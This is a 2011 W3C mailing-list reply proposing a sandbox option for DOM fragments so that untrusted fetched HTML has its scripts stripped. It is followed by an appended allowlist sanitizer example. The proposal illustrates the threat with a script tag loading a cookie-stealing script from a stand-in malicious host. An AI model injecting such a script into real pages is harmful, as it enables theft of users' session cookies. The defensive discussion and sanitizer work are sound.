- From: Ryan Seddon <seddon.ryan@gmail.com>
- Date: Tue, 8 Nov 2011 15:23:50 +1100
- To: Ojan Vafai <ojan@chromium.org>
- Cc: Yehuda Katz <wycats@gmail.com>, public-webapps WG <public-webapps@w3.org>
Received on Tuesday, 8 November 2011 04:24:48 UTC
On Tue, Nov 8, 2011 at 4:30 AM, Ojan Vafai <ojan@chromium.org> wrote:
> I don't really follow. Script won't execute until you append the fragment
> to the DOM, at which point the fragment itself doesn't go in the DOM, just
> its children. So, I'm not really sure what sandboxing on fragments would
> do.

If I was ajaxing in potentially hostile content that had malicious script tags in it, it would be ideal to "sandbox" the content so the HTML parser in the browser would strip the content for me.

xhr.responseText = '<div><script src="//malicious.site/cookieStealer.js"></script><h1>content</h1></div>';
var frag = document.createDocumentFragment();
frag.sandbox = "";
frag.innerHTML = xhr.responseText; // it's sandboxed so the script(s) will be stripped by the parser.
document.body.appendChild(frag);

The following article demonstrates the same concept using an iframe with the sandbox attribute set[1]. This to me would also make sense to be extended to fragments.

[1] http://community.jboss.org/people/wesleyhales/blog/2011/08/28/fixing-ajax-on-mobile-devices

-Ryan
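
Added example, not part of the original message or of any API proposed in this thread: one way to get the effect requested above with existing DOM APIs is to parse the response into an inert document with DOMParser and keep only allowlisted elements and attributes before moving the nodes into a fragment. The function names (`sanitizeTree`, `insertUntrusted`) and the allowlists are assumptions chosen for illustration.

```javascript
// Added example. The allowlists below are illustrative assumptions; tune them per application.
const ALLOWED_TAGS = new Set(["DIV", "SPAN", "P", "H1", "H2", "H3", "UL", "OL", "LI", "A", "EM", "STRONG"]);
const ALLOWED_ATTRS = new Set(["href", "title"]);
// Absolute http(s), mailto and same-page links only; no whitespace or backslashes.
const SAFE_HREF = /^(https?:\/\/|mailto:|#)[^\s\\]*$/i;

// Walks the element children of `root`, removing anything not allowlisted.
// Returns the number of elements removed (each with its subtree).
function sanitizeTree(root) {
  let removed = 0;
  // Snapshot the live collection: removing while iterating it would skip siblings.
  for (const el of Array.from(root.children)) {
    if (!ALLOWED_TAGS.has(el.tagName)) {
      // Covers <script>, <iframe>, <style>, <form>, SVG/MathML and unknown tags.
      // removeChild is called on the already-vetted parent, not on the untrusted node.
      root.removeChild(el);
      removed++;
      continue;
    }
    for (const attr of Array.from(el.attributes)) {
      const name = attr.name.toLowerCase();
      const ok = ALLOWED_ATTRS.has(name) &&
                 (name !== "href" || SAFE_HREF.test(attr.value));
      // Drops on* handlers, style, src, and href values such as javascript: URLs.
      if (!ok) el.removeAttribute(attr.name);
    }
    removed += sanitizeTree(el);
  }
  return removed;
}

// Browser-only entry point (hypothetical name): parse, clean, then insert.
function insertUntrusted(html, target) {
  // A DOMParser document is inert: scripts inside it are never executed.
  const doc = new DOMParser().parseFromString(html, "text/html");
  const removed = sanitizeTree(doc.body);
  const frag = document.createDocumentFragment();
  // Move the surviving nodes; no re-serialisation to a string takes place.
  while (doc.body.firstChild) frag.appendChild(doc.body.firstChild);
  target.appendChild(frag);
  return removed;
}
```

In a page this would be called as `insertUntrusted(xhr.responseText, document.body)`; the return value is the number of elements that were dropped, which is worth logging when the content source is supposed to be trusted.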